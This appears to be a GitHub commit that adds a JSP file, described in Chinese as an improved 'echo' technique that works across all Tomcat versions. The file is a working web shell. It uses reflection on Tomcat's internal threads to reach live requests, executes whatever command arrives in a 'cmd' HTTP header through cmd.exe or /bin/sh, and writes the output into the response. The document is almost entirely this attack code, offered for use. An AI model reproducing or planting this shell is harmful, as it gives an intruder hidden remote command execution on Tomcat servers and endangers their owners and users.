
Commit 5d5bd55

authored
Add files via upload
更新tomcat全版本回显,优化代码逻辑,之前的逻辑存在瑕疵
1 parent c53a70f commit 5d5bd55


2 files changed

+85
-0
lines changed
Lines changed: 85 additions & 0 deletions
@@ -0,0 +1,85 @@
1+
<%@ page import="org.apache.tomcat.util.buf.ByteChunk" %>
2+
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
3+
<%
4+
boolean flag = false;
5+
ThreadGroup group = Thread.currentThread().getThreadGroup();
6+
java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
7+
f.setAccessible(true);
8+
Thread[] threads = (Thread[]) f.get(group);
9+
10+
for(int i = 0; i < threads.length; i++) {
11+
try{
12+
Thread t = threads[i];
13+
if (t == null) continue;
14+
15+
String str = t.getName();
16+
if (str.contains("exec") || !str.contains("http")) continue;
17+
18+
19+
f = t.getClass().getDeclaredField("target");
20+
f.setAccessible(true);
21+
Object obj = f.get(t);
22+
23+
if (!(obj instanceof Runnable)) continue;
24+
25+
f = obj.getClass().getDeclaredField("this$0");
26+
f.setAccessible(true);
27+
obj = f.get(obj);
28+
29+
try{
30+
f = obj.getClass().getDeclaredField("handler");
31+
}catch (NoSuchFieldException e){
32+
f = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("handler");
33+
}
34+
f.setAccessible(true);
35+
obj = f.get(obj);
36+
37+
try{
38+
f = obj.getClass().getSuperclass().getDeclaredField("global");
39+
}catch(NoSuchFieldException e){
40+
f = obj.getClass().getDeclaredField("global");
41+
}
42+
f.setAccessible(true);
43+
obj = f.get(obj);
44+
45+
f = obj.getClass().getDeclaredField("processors");
46+
f.setAccessible(true);
47+
java.util.List processors = (java.util.List)(f.get(obj));
48+
49+
for(int j = 0; j < processors.size(); ++j) {
50+
Object processor = processors.get(j);
51+
f = processor.getClass().getDeclaredField("req");
52+
f.setAccessible(true);
53+
Object req = f.get(processor);
54+
Object resp = req.getClass().getMethod("getResponse", new Class[0]).invoke(req, new Object[0]);
55+
56+
str = (String)req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"});
57+
58+
if (str != null && !str.isEmpty()) {
59+
resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});
60+
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", str} : new String[]{"/bin/sh", "-c", str};
61+
byte[] result = (new java.util.Scanner((new ProcessBuilder(cmds)).start().getInputStream())).useDelimiter("\\A").next().getBytes();
62+
63+
try {
64+
Class cls = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
65+
obj = cls.newInstance();
66+
cls.getDeclaredMethod("setBytes", new Class[]{byte[].class, int.class, int.class}).invoke(obj, new Object[]{result, new Integer(0), new Integer(result.length)});
67+
resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
68+
} catch (NoSuchMethodException var5) {
69+
Class cls = Class.forName("java.nio.ByteBuffer");
70+
obj = cls.getDeclaredMethod("wrap", new Class[]{byte[].class}).invoke(cls, new Object[]{result});
71+
resp.getClass().getMethod("doWrite", new Class[]{cls}).invoke(resp, new Object[]{obj});
72+
}
73+
74+
flag = true;
75+
}
76+
77+
if (flag) break;
78+
}
79+
80+
if (flag) break;
81+
}catch(Exception e){
82+
continue;
83+
}
84+
}
85+
%>
Binary file not shown.
